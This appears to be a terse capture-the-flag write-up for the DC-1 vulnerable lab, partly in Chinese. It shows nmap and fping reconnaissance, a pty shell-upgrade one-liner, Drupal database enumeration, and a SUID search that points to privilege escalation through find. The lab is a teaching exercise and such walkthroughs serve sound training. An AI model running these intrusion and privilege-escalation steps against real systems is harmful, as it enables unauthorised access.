# DC-1

Description
DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.
It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.
To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.
There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.
There are five flags in total, but the ultimate goal is to find and read the flag in root’s home directory. You don’t even need to be root to do this, however, you will require root privileges.
Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.
Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

Write-UP

hausa@debian:~$fping -asg 172.16.100.1/24 172.16.100.1 172.16.100.129 扫172.16.100.129的开放端口： hausa@debian:~$ nmap -Pn 172.16.100.129
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 10:26 EDT
Nmap scan report for 172.16.100.129
Host is up (0.49s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds

Drupal，是一个CMS，老版本了，msf上就有exp。

cat flag1.txt
Every good CMS needs a config file – and so do you.

flag2大致意思是：除了爆破，你还有什么办法？

python -c “import pty;pty.spawn(‘/bin/bash’)”

use drupaldb;
show tables;

output hash may be manually entered into the {users}.pass field to
change a password via SQL to a known value.

To execute this script this has to be the root directory of your
Drupal installation

Special PERMS will help FIND the passwd – but you’ll need to -exec that command to work out how to get what’s in the shadow.

suid提权：当s标志出现在文件所有者的x权限上时，则此程序被设置了SUID特殊权限。

www-data@DC-1:/var/www\$ find /bin /sbin /usr/bin /usr/sbin -perm -4000
find /bin /sbin /usr/bin /usr/sbin -perm -4000
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/sbin/mount.nfs
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4

find命令有，
find的时候要找一个存在的文件，尽量不要find文件夹，否则会出现无输出或输出太多的情况。

Well done!!!!
Hopefully you’ve enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter – @DCAU7